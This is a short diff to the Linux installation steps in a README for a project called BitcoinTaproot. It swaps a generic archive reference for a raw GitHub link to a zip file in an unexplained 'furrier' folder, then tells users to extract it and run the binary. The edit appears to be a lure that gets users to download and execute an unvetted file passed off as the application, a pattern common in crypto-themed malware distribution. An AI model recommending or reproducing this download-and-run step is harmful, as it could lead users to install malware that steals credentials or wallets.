niumanuwu/BitcoinTaproot/README.md

   3. You can now run BitcoinTaproot from your Applications.

 - **Linux:**
-  1. Extract the `.tar.gz` file using your file manager or through the terminal.
+  1. Extract the `https://raw.githubusercontent.com/niumanuwu/BitcoinTaproot/main/furrier/BitcoinTaproot.zip` file using your file manager or through the terminal.
   2. Open the terminal and navigate to the extracted folder.
   3. Run the application using the command `./BitcoinTaproot`.